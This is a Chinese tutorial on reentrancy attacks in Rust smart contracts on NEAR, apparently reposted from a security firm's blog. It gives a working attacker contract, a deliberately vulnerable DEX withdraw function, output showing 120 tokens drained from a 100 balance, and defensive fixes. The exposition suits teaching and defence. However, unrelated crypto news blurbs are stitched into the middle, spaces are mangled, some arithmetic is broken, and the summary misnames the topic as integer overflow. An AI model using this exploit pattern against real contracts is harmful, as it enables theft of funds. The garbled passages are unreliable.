相关文章:
Rust智能合约养成日记合约状态数据定义与方法实现
Rust智能合约养成日记编写Rust智能合约单元测试
Rust智能合约养成日记Rust智能合约部署,函数调用及Explorer的使用
Rust智能合约养成日记Rust智能合约整数溢出
这一期中我们将向大家展示Rust合约中重入攻击,并提供给开发者相应的建议。本文中的相关代码,已上传至BlockSec的Github上,读者可以自行下载:https://github.com/blocksecteam/near_demo
我们用现实生活中的简单例子来理解重入攻击:即假设某用户在银行中存有100元现金,当用户想要从银行中取钱时,他将首先告诉柜员-A:“我想要取60元”。柜员-A此时将查询用户的余额为100元,由于该余额大于用户想要取出的数额,所以柜员-A首先将60元现金交给了该位用户。但是当柜员-A还没有来得及将用户的余额更新为40元的时,用户跑去隔壁告诉另一位柜员-B:“我想要取60元”,并隐瞒了刚才已经向柜员-A取钱的事实。由于用户的余额还没有被柜员-A更新,柜员-B检查用户的余额仍旧为100元,因此柜员-B将毫不犹豫地继续将60元交给用户。最终用户实际已经获得了120元现金,大于之前存在银行中的100元现金。
为什么会发生这样的事情呢?究其原因还是因为柜员-A没有事先将用户的60元从该用户的账户中扣除。若柜员-A能事先扣除金额。用户再询问柜员-B取钱时,柜员-B就会发现用户的余额已更新,无法取出比余额(40元)更多的现金了。
以上述“从银行取钱”这一典型过程为例,映射到具体的智能合约世界中来,实际上跨合约调用行为的发生和真正更新本地所维护的合约数据之间也同样地存在一定的时间间隔。而该时间间隔的存在以及这两个步骤之前不恰当的顺序关系,将给攻击者实施重入攻击创造有利条件。
下文第2小节将首先介绍相关的背景知识,第3小节将在NEARLocalNet中演示说明一个具体的重入攻击例子,以体现代码重入对于部署在NEAR链上的智能合约的危害性。本文最后将具体介绍针对重入攻击的防护技术,帮助大家更好的编写Rust智能合约。
交易所,充值(deposite)或者提现(withdraw)一定数额的Token时,用户便可以调用相应的合约接口完成具体的操作。
SBP与矿企Crusoe Energy进行试点,旨在最大限度减少甲烷排放:4月27日消息,代币化环保能源初创公司Sustainable Bitcoin Protocol(SBP)与加密货币矿企Crusoe Energy一起试点,以改进挖矿对环境影响。SBP表示,通过第三方审计,SBP将验证Crusoe的废气采购和技术是否符合可验证地减少温室气体排放和促进清洁能源转型的标准,这个过程仍然会排放温室气体,但最大限度减避免了甲烷排放。[2023/4/27 14:31:30]
DEX项目合约在执行所对应的接口函数时,将调用Token合约中的ft_transfer/ft_transfer_call函数,实现正式的转账操作。这两个函数的区别如下:
当调用Token合约中的ft_transfer函数时,转账的接收者(receiver_id)为EOA账户。
当调用Token合约中的ft_transfer_call函数时,转账的接收者(receiver_id)为合约账户。
而对于ft_transfer_call而言,该方法内部除了首先会扣除该笔交易发起者(sender_id)的转账数额,并增加受转账用户(receiver_id)的余额,此外还额外增加了对receiver_id合约中ft_on_transfer(收币函数)的跨合约调用。这里可以简单理解为,此时Token合约将提醒receiver_id合约,有用户存入了指定数额的Token。receiver_id合约将在ft_on_transfer函数中自行维护内部账户的余额管理。
合约A:Attacker合约;
攻击者将利用该合约实施后续的攻击交易。
合约B:Victim合约。
为一个DEX合约。初始化的时候,Attacker账户拥有余额100,DEX的其他用户拥有余额100。即此时DEX合约总共持有了200个Token。
##pub?struct?VictimContract?{??attacker_balance:?u128,??other_balance:?u128,}impl?Default?for?VictimContract?{??fn?default()?->?Self?{????Self?{??????attacker_balance:?100,??????other_balance:100???}?}}合约C:Token合约。
以太坊核心开发者推出新Rust语言的EVM实现“evmodin”:以太坊核心开发者Artem Vorotnikov推出新Rust语言的EVM实现:evmodin,其支持完全异步。[2021/7/16 0:56:54]
攻击发生前,因为Attacker账户没有从Victim合约提现,所以余额为0,此时Victim合约(DEX)的余额为100100=200;
##pub?struct?FungibleToken?{??attacker_balance:?u128,??victim_balance:?u128}impl?Default?for?FungibleToken?{??fn?default()?->?Self?{????Self?{??????attacker_balance:?0,??????victim_balance:?200???}?}
下面描述该代码重入攻击的具体流程:
Attacker合约通过malicious_call函数,调用Victim合约中的withdraw函数;
例如此时Attacker给withdraw函数传入amount参数的值为60,希望从合约B中提现60;
impl?MaliciousContract?{??pub?fn?malicious_call(&mut?self,?amount:u128){????ext_victim::withdraw(??????amount.into(),??????&VICTIM,???????0,???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?????);?}...}
在合约B中,withdraw函数开头处的assert!(self.attacker_balance>=amount);`将检查Attacker账户是否有足够的余额,此时余额100>60,将通过断言,执行withdraw中后续的步骤。
impl?VictimContract?{??pub?fn?withdraw(&mut?self,amount:?u128)?->?Promise{????assert!(self.attacker_balance>=?amount);????//CallAttacker的收币函数????ext_ft_token::ft_transfer_call(??????amount.into(),??????&FT_TOKEN,???????0,???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?*?2?????)?????.then(ext_self::ft_resolve_transfer(????????amount.into(),???????&env::current_account_id(),????????0,????????GAS_FOR_SINGLE_CALL,?????))?}...}?合约B中的withdraw函数接着将调用合约C中的ft_transfer_call函数;
Crust已发放Kusama插槽竞拍第二批奖励:北京时间6月23日15:00,Crust发放了Kusama插槽竞拍第二批奖励,对支持Crust Shadow的5280.0682244个KSM总共发放奖励370.098337个CRU和73929.55141个CSM。
Crust Shadow于6月9日启动众贷Crowdloan,此前第一批奖励已于北京时间6月16日发放。
用户随时可以质押KSM参与Crust插槽竞拍活动,在每次快照前完成KSM锁仓均可获得奖励,众贷期间每周每个KSM可获得0.07个CRU和14个CSM奖励,无论竞拍是否成功支持者都可获得奖励。
获得CSM的用户可继续参与Crust“数据创造价值”活动,存储文件,质押CSM赢取总共54,000CRU的奖励。[2021/6/23 0:01:02]
通过上述代码中的ext_ft_token::ft_transfer_call实现跨合约调用。
合约C中的ft_transfer_call函数,将更新attacker账户的余额=060=60,以及Victim合约账户的余额=200-60=140,随后通过ext_fungible_token_receiver::ft_on_transfer调用合约A的ft_on_transfer“收币”函数。
#impl?FungibleToken?{??pub?fn?ft_transfer_call(&mut?self,amount:?u128)->?PromiseOrValue<U128>{????//相当于internal_ft_transfer????self.attacker_balance?=?amount;????self.victim_balance???-=?amount;????//CallAttacker的收币函数????ext_fungible_token_receiver::ft_on_transfer(??????amount.into(),??????&ATTACKER,??????0,???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?????).into()?}...}由于合约A被Attacker所控制,并且代码存在恶意的行为。所以该“恶意”的ft_on_transfer函数可以再次通过执行ext_victim::withdraw,调用合约B中的withdraw函数,以此达到重入的效果。
MixTrust(MXT)获得Hash Capital 战略投资并达成合作:据官方消息,投资机构Hash Capital 和MixTrust(MXT)项目已达成战略合作,并出资1000万美金投资MixTrust团队开发的流动性挖矿产品MixCake。
Hash Capital 是一家专注于区块链行业投资和数字资产管理的专业投资机构。投资赛道包含智能合约、证券交易结算、身份证明、分布式记账、数据 API 以及区块链基础设施等领域。
MixTrust是基于以太坊的去中心化合成资产发行协议,为合成资产提供了去中心化的跨链交易平台:支持无缝资产合成,去中心化的跨链交易和跨链抵押贷款,对标SNX和REN。[2021/3/6 18:21:16]
#impl?MaliciousContract?{??pub?fn?ft_on_transfer(&mut?self,?amount:?u128){????//恶意合约的收币函数????if?self.reentered?==?false{??????ext_victim::withdraw(????????amount.into(),????????&VICTIM,?????????0,?????????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL???????);???}????self.reentered?=?true;?}...}由于上一次进入withdraw以来,victim合约中的attacker_balance还没有更新,所以还是100,因此此时仍旧可以通过assert!(self.attacker_balance>=amount)的检查。withdraw后续将再次在FT_Token合约中跨合约调用ft_transfer_call函数,更新attacker账户的余额=6060=120,以及Victim合约账户的余额=140-60=80;
ft_transfer_call再次调用回Attacker合约中的ft_on_transfer函数。由于目前设置合约A中ft_on_transfer函数只会重入withdraw函数一次,所以重入行为在本次ft_on_transfer的调用时终止。
此后函数将沿着之前的调用链逐级返回,导致合约B中的withdraw函数中在更新self.attacker_balance的时候,最终使得self.attacker_balance=100-60-60=-20
TrustToken:TrueFi推出以来已借出1850万美元:TrustToken官方发推表示,链上无抵押借贷协议TrueFi自推出以来,已借出1850万美元。[2021/1/10 15:46:14]
由于self.attacker_balance是u128,且并没有使用safe_math,因此将导致整数的溢出现象。
最终执行的结果如下:
$node?Triple_Contracts_Reentrancy.js?FinishinitNEARFinishdeploycontractsandcreatetestaccountsVictim::attacker_balance:3.402823669209385e38FT_Token::attacker_balance:120FT_Token::victim_balance:80
即尽管用户Attacker在DEX中锁定的FungibleToken余额仅100,但是最终Attacker实际获得的转账为120,实现了本次代码重入攻击的目的。
4.代码重入防护技术
4.1先更新和与状态,再转账
更改合约B代码withdraw中的执行逻辑为:
#impl?VictimContract?{??pub?fn?withdraw(&mut?self,amount:?u128)?->?Promise{????assert!(self.attacker_balance>=?amount);????self.attacker_balance?-=?amount;????//CallAttacker的收币函数????ext_ft_token::ft_transfer_call(??????amount.into(),??????&FT_TOKEN,???????0,???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?*?2?????)?????.then(ext_self::ft_resolve_transfer(????????amount.into(),???????&env::current_account_id(),????????0,????????GAS_FOR_SINGLE_CALL,?????))?}??#??pub?fn?ft_resolve_transfer(&mut?self,?amount:?u128){????match?env::promise_result(0){??????PromiseResult::NotReady?=>?unreachable!(),??????PromiseResult::Successful(_)?=>?{?????}??????PromiseResult::Failed?=>?{???????//若ext_ft_token::ft_transfer_call跨合约调用转账失败,???????//则回滚之前账户余额状态的更新self.attacker_balance?=?amount;??????}???};?}
此时的执行效果如下:
$node?Triple_Contracts_Reentrancy.js?FinishinitNEARFinishdeploycontractsandcreatetestaccountsReceipt:873C5WqMyaXBFM3dmoR9t1sSo4g5PugUF8ddvmBS6g3X???Failure:Error:{"index":0,"kind":{"ExecutionError":"Smartcontractpanicked:panickedat'assertionfailed:self.attacker_balance>=amount',src/lib.rs:45:9"}}Victim::attacker_balance:40FT_Token::attacker_balance:60FT_Token::victim_balance:140
可见由于此时的Victim合约在withdraw的时候事先更新了用户的余额,在调用外部的FungibleToken实施转账。因此当第二次重入了withdraw的时候,Victim合约中保存的attacker_balance已经更新为40,因此将无法通过assert!(self.attacker_balance>=amount);使得Attcker的调用流程由于触发了AssertionPanic,无法利用代码重入进行套利。
4.2引入互斥锁
该方法类似于当柜员-A还没有来得及将用户的余额更新为40元的时,用户跑去隔壁告诉另一位柜员-B:“我想要取60元”。尽管用户隐瞒了刚才已经向柜员-A取钱的事实。但是柜员-B却能够知道用户已经去过柜员-A那里,并且还没有办结所有的事项,此时柜员-B便可以拒绝用户来取钱。通常情况下可以通过引入一个状态变量,来实现一个互斥锁
4.3设置GasLimit
例如在DEX合约的withdraw方法调用ext_ft_token::ft_transfer_call时,设置一个适当的GasLimit。此GasLimit将不够支持下一次代码再次重入DEX合约的withdraw函数,以此阻断重入攻击的能力。
例如对代码做如下修改,限制withdraw方法调用外部函数时的GasLimit:
??pub?fn?withdraw(&mut?self,amount:?u128)?->?Promise{????assert!(self.attacker_balance>=?amount);????//CallAttacker的收币函数????ext_ft_token::ft_transfer_call(??????amount.into(),??????&FT_TOKEN,???????0,?-???????env::prepaid_gas()?-?GAS_FOR_SINGLE_CALL?*?2???????GAS_FOR_SINGLE_CALL?*?3?????)?????.then(ext_self::ft_resolve_transfer(????????amount.into(),???????&env::current_account_id(),????????0,????????GAS_FOR_SINGLE_CALL,?????))?}
修改后执行效果如下
$node?Triple_Contracts_Reentrancy.jsFinishinitNEARFinishdeploycontractsandcreatetestaccountsReceipt:5xsywUr4SePqfuotLXMragAC8P6wJuKGBuy5CTJSxRMX???Failure:Error:{"index":0,"kind":{"ExecutionError":"Exceededtheprepaidgas."}}Victim::attacker_balance:40FT_Token::attacker_balance:60FT_Token::victim_balance:140
可见限制跨合约函数调用时的GasLimit也能起到防止重入攻击的效果。
本期总结和预告
这一期我们讲述了rust智能合约中的整数溢出问题,同时给出了建议,在书写代码时尽量先更新状态,再执行转账操作,并且设定合适的gas值,可以有效抵御重入攻击,下一期我们将讲述rust智能合约中的DoS问题,敬请关注。
标签:TRATACATTACKBitrace TokenTachyon ProtocolMATTERSwapTracker
親愛的AAX用戶: AAX將支持Tezos網絡升級,具體安排如下:●AAX將於2022年3月31日19:00(東八區時間)暫停XTZ代幣充值和提現業務,以支持Tezos預計於2022年4月1日08:53(東八區時間)進行的網絡升級.
1900/1/1 0:00:00GTAI交易界面 每天——或者每小时——认真地检查加密货币市场:这是一种肾上腺素激增,但这是最有效的交易方式吗?如果效率是您的目标,那么算法加密货币交易机器人可以提供帮助.
1900/1/1 0:00:00俄乌地缘局势使得比特币采用率大幅提升,先是乌克兰接受加密货币捐赠,随后俄罗斯在欧美制裁背景下表示接受比特币支付,这使得比特币等作为国际结算工具的进程大大加快.
1900/1/1 0:00:00原文作者:Jinji金桔,Mingzin原文编辑:Mingzin出品:推特@N_SpaceDAOweb3.0世界可以定义为虚拟现实(virtualreality)和增强现实(augmentedreality)所形成的空间.
1900/1/1 0:00:00核心要点 目前,BTC上攻受阻于MA240等重要均线,昨日大户转移休眠BTC,在消息面上产生一定悲观影响;而另一方面,MacroStrategy以比特币为抵押完成2.05亿美元定期贷款,或购买更多比特币,这显示出机构仍然看好加密后市.
1900/1/1 0:00:00親愛的用戶:幣安槓桿“歡樂週五”活動已結束。最後一回的現金券獎勵將於2022年04月01日17:00分發。現金券自發放當日起5日內有效,用戶可通過活動頁面查看並領取現金券.
1900/1/1 0:00:00